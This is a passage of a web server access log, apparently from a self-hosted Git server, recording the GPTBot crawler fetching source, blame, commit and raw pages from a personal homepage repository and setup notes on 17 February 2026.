AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json" +[17/Feb/2026:13:27:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12451] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx" +[17/Feb/2026:13:27:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9848] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx" +[17/Feb/2026:13:27:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup" [Client 74.7.227.38] [Length 9854] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup" +[17/Feb/2026:13:27:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" [Client 74.7.227.38] [Length 14252] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup" +[17/Feb/2026:13:27:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html" [Client 74.7.227.38] [Length 14390] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup" +[17/Feb/2026:13:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py" [Client 74.7.227.38] [Length 13002] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup" +[17/Feb/2026:13:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:27:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile" [Client 74.7.227.38] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile" +[17/Feb/2026:13:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 14878] [Gzip 8.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:13:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 2253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:13:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11210] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json" +[17/Feb/2026:13:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json" +[17/Feb/2026:13:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json" [Client 74.7.227.38] [Length 10023] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json" +[17/Feb/2026:13:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10381] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json" +[17/Feb/2026:13:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" +[17/Feb/2026:13:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html" +[17/Feb/2026:13:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11649] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" +[17/Feb/2026:13:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11522] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" +[17/Feb/2026:13:27:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md" [Client 74.7.227.38] [Length 11344] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" +[17/Feb/2026:13:27:14 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" +[17/Feb/2026:13:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html" [Client 74.7.227.38] [Length 13282] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html" +[17/Feb/2026:13:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html" +[17/Feb/2026:13:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12785] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" +[17/Feb/2026:13:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" +[17/Feb/2026:13:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11497] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" +[17/Feb/2026:13:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components" [Client 74.7.227.38] [Length 10615] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" +[17/Feb/2026:13:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets" [Client 74.7.227.38] [Length 10362] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" +[17/Feb/2026:13:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx" +[17/Feb/2026:13:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts" +[17/Feb/2026:13:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md" +[17/Feb/2026:13:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx" +[17/Feb/2026:13:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 10860] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx" +[17/Feb/2026:13:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md" [Client 74.7.227.38] [Length 10980] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md" +[17/Feb/2026:13:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12481] [Gzip 5.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx" +[17/Feb/2026:13:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx" +[17/Feb/2026:13:27:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 10757] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore" +[17/Feb/2026:13:27:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts" [Client 74.7.227.38] [Length 10807] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts" +[17/Feb/2026:13:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore" +[17/Feb/2026:13:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets" [Client 74.7.227.38] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets" +[17/Feb/2026:13:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py" +[17/Feb/2026:13:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13902] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components" +[17/Feb/2026:13:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services" +[17/Feb/2026:13:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components" [Client 74.7.227.38] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components" +[17/Feb/2026:13:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts" +[17/Feb/2026:13:27:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx" +[17/Feb/2026:13:27:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md" +[17/Feb/2026:13:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore" +[17/Feb/2026:13:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json" [Client 74.7.227.38] [Length 11075] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" +[17/Feb/2026:13:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11883] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" +[17/Feb/2026:13:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11301] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" +[17/Feb/2026:13:27:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json" +[17/Feb/2026:13:27:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 